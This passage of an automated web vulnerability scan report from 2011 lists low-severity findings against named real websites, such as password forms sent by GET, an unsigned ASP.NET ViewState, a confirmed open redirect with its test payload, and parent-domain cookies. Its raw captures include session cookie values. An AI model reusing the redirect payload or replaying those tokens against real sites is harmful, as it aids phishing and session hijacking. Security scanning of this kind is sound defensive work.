<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

   <META HTT
...[SNIP]...
<div id="fForm" class="fForm">
<form name="LogIn" id="LogIn">
<INPUT TYPE="text" NAME="userid" id="userid" SIZE="20" MAXLENGTH="100" >
<INPUT TYPE="password" NAME="pwd" id="pwd" SIZE="20" MAXLENGTH="50" >
</form>
...[SNIP]...

10.3. http://www.soundpatheview.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.soundpatheview.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.soundpatheview.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title
...[SNIP]...
<div id="form_mods">
               <form id="hostform" action="">
                   <div class="form_cont">
...[SNIP]...
</div>
        <input type="password" id="host_pin" name="Password" title="Pin" maxlength="17" value="" />
        <div>
...[SNIP]...

11. ASP.NET ViewState without MAC enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /Login.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dmaskBG.png%26noGzip%3d1&res=maskBG.png&noGzip=1 HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/Login.aspx?ReturnUrl=%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 13712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTEwOTg5NjY3NQ9kFgJmD2QWAgIDD2QWBgIDDw8WAh4HVmlzaWJsZWdkZAIFDw8WAh8AZ2RkAhkPZBYCAgEPZBYCAgEPDxYCHg9HWmlwQ29tcHJlc3Npb25oZGRk" />
...[SNIP]...

12. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a54eba6a0f332d8d7/a%3fhttp%3a//ad.doubleclick.net/clk%3b233236047%3b62821348%3bd%3fhttps%3a//personal.vanguard.com/us/funds/snapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 was submitted in the url parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a//a54eba6a0f332d8d7/a%3fhttp%3a//ad.doubleclick.net/clk%3b233236047%3b62821348%3bd%3fhttps%3a//personal.vanguard.com/us/funds/snapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://a54eba6a0f332d8d7/a?http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:15 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:15 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34116
Date: Thu, 12 May 2011 11:01:15 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13. Cookie scoped to parent domain
There are 90 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://convctr.overture.com/images/cc/cc.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://convctr.overture.com
Path:   /images/cc/cc.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/cc/cc.gif?ver=1.0&aID=5819599720&mkt=0&ref= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: convctr.overture.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:00 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL1ODi4vzMoDyGQWYGls5OjsZObgYWRq5GAE5xk2YO; domain=.overture.com; path=/; expires=Thu, 12-May-2011 11:20:00 GMT
Set-Cookie: UserData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL4tCQVIZRZgaWzk6Oxk5uBhZGrkYATspeIQ0%3D; domain=.overture.com; path=/; expires=Sun, 09-May-2021 11:15:00 GMT
P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA "
Pragma: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 34

GIF89a.............,...........L.;

13.2. http://foxbusiness.disqus.com/thread.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://foxbusiness.disqus.com
Path:   /thread.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thread.js?url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&title=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&sort=&per_page&category_id=462875&developer=0&identifier=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&remote_auth_s2=e30%3D%20c5d5d037748a67e6b04679c3eadc2d7b0b1486fb%201305198974&1305200288779 HTTP/1.1
Host: foxbusiness.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1305161240.15.15.utmcsr=connectedplanetonline.com|utmccn=(referral)|utmcmd=referral|utmcct=/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/; __utma=113869458.1602204697.1303349184.1305126028.1305161240.15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Content-Language: en-us
Vary: Accept-Language,Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: test=1; Path=/
Set-Cookie: sessionid=5439c19bf65868637b6d94bd5708f992; Domain=.disqus.com; expires=Thu, 26-May-2011 11:39:08 GMT; Max-Age=1209600; Path=/
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 8829

/*jslint evil:true */
/**
* Dynamic thread loader
*
*
*
*
*
*
*/

//
var DISQUS;
if (!DISQUS || typeof DISQUS == 'function') {
throw "DISQUS object is not initialized";
}
//

// json
...[SNIP]...

13.3. https://personal.vanguard.com/us/funds/snapshot

Summary

Severity:   Low
Confidence:   Firm
Host:   https://personal.vanguard.com
Path:   /us/funds/snapshot

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: personal.vanguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:22 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
Set-Cookie: TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT
Content-language: en
Set-cookie: JSESSIONID=0000NlNxb4pkRjQ9SuyVJzXRQ-V:15o5flja9; Path=/; Domain=.vanguard.com; Secure
Set-cookie: SSLB=0; Path=/; Domain=.vanguard.com
Set-Cookie: HNWPRD=D21;path=/;domain=.vanguard.com;
Content-Length: 62217



...[SNIP]...

13.4. http://www.dmoc.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dmoc.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Diserio+Martin+O%27Connor+%26+Castiglioni&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
ETag: "8613988e24a0a3d3f954f30e88bb50ea"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Set-Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=959b2d7543b91794550623991d8a8d37; expires=Sat, 04-Jun-2011 15:53:02 GMT; path=/; domain=.dmoc.com
Last-Modified: Thu, 12 May 2011 05:21:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

13.5. http://www.elawmarketing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.elawmarketing.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/practice-areas.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS12e590b5abdc44fd41146e46388173a1=c8f73722530b0816abc1b10d32d412d7; expires=Sat, 04-Jun-2011 15:33:34 GMT; path=/; domain=.elawmarketing.com
Last-Modified: Thu, 12 May 2011 12:00:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 48659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...

13.6. http://www.korteco.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.korteco.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:11:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS31e5fbde7def436979bdb9291b5781da=kqafn01oinjtbje997dusc7ce2; expires=Sat, 04 Jun 2011 16:44:44 GMT; path=/; domain=.korteco.com
Last-Modified: Thu, 12 May 2011 12:45:12 GMT
ETag: "66bb27227b2dbbabf0e8363239bdacb3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...

13.7. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.usaa.com
Path:   /inet/imco_mutualfund/ImMutualFunds

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004 HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Env: DCITC
Content-Type: text/html
Content-Language: en-US
Date: Thu, 12 May 2011 11:24:17 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
Set-Cookie: MemberGlobalSession=2:1001:4WCSMG1D143X7EVESDUQU; Path=/; Domain=.usaa.com; Secure
Set-Cookie: tempCookie=testCookie
Set-Cookie: dcenv=DCITC; path=/; domain=usaa.com
Content-Length: 5180

<html>
<head>
<noscript><meta http-equiv="refresh" content="0; url=https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004&bpjs=false"></noscript>
<script language="J
...[SNIP]...

13.8. http://ad.amtk-media.com/iframe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:12 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422944; expires=Sat, 11 May 2013 23:37:12 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:12 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4217
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...

13.9. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 11:01:14 GMT
Server: GFE/2.0
Content-Type: text/html


13.10. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?&pub=2137329&code=8842770&cch=8841762&l=300x250&tmz=-5&area=-1&res=1920&rnd=0.9122231449000537&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F&loc=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sat, 14 May 2011 11:39:23 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
